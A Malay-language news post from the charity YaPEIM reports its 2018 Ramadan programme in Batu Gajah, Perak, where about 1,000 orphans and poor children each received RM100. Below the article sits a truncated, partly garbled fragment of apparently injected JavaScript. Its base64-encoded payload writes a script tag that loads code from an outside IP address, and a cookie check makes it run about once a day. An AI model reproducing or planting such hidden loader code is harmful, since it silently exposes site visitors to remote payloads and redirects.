YaPEIM » PROGRAM INSPIRASI RAMADHAN YaPEIM 2018/1439H DI BATU GAJAH, PERAK

Terkini

PROGRAM INSPIRASI RAMADHAN YaPEIM 2018/1439H DI BATU GAJAH, PERAK

Bagi negeri Perak, sejumlah RM120,000 peruntukkan diagih kepada 1,000 orang anak yatim & miskin.

Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) hari ini meraikan kira-kira 1,000 anak yatim dan miskin di Masjid Toh Puan Besar Hatijah, Batu Gajah, Perak sempena Program Inspirasi Ramadhan YaPEIM 2018 bersamaan 1439H.

Tn Hj Mohammad Zamri Zakaria, Pengarah Kanan Pembangunan Sosioekonomi & Komunikasi Korporat YaPEIM telah menyampaikan sumbangan berupa wang tunai RM100 setiap seorang dan barangan berbentuk bahan bacaan.

Bagi tahun 2018, YaPEIM memperuntukkan RM2.5 juta bagi menjayakan majlis dengan menyantuni 14,000 orang penerima sumbangan di 16 buah lokasi seluruh negara.

Sehingga kini, YaPEIM membelanjakan lebih RM7 juta bagi pelaksanaan program ini dengan melibatkan lebih 60,000 orang penerima manfaat keseluruhannya.

Program Inspirasi Ramadhan YaPEIM mula dilaksanakan pada 2016 dan diteruskan pada 2017 di seluruh negara bagi menyantuni anak yatim & miskin disamping menghidupkan ramadhan dengan aktiviti keagamaan dan kebajikan.

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top